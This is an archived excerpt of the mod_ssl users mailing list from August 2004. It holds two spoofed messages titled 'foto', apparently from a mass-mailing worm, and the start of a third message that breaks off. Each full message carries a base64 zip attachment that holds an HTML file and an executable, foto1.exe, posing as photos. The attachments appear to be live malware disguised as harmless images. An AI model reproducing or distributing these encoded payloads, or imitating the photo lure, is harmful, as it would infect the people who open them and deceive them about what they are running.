X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ftsc-laptop.net (66-44-105-71.s833.apx2.lnhdc.md.dialup.rcn.com [66.44.105.71])
	by master.modssl.org (Postfix) with SMTP id 5B576A8D09
	for ; Tue, 31 Aug 2004 21:46:20 +0200 (CEST)
Date: Tue, 31 Aug 2004 15:47:49 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------rtdshxakwgykbjngooqf"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------rtdshxakwgykbjngooqf
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------rtdshxakwgykbjngooqf
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
AA==

----------rtdshxakwgykbjngooqf--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 21:49:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 52CB8A8A79; Tue, 31 Aug 2004 21:49:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from tinky-winky.com (24.107.134.203.charter-stl.com [24.107.134.203])
	by master.modssl.org (Postfix) with SMTP id 2D626A8934
	for ; Tue, 31 Aug 2004 21:49:47 +0200 (CEST)
Date: Tue, 31 Aug 2004 14:38:29 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------wdkrqzacsjzvbxiclghn"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------wdkrqzacsjzvbxiclghn
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------wdkrqzacsjzvbxiclghn
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
AA==

----------wdkrqzacsjzvbxiclghn--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 22:00:07 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 74656A8A79; Tue, 31 Aug 2004 22:00:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from venkat.org (67.106.70.70.ptr.us.xo.net [67.106.70.70])
	by master.modssl.org (Postfix) with SMTP id 9E4AAA8934
	for ; Tue, 31 Aug 2004 22:00:00 +0200 (CEST)
Date: Tue, 31 Aug 2004 14:59:57 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------jsoujmyehbebriaatmmm"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------jsoujmyehbebriaatmmm
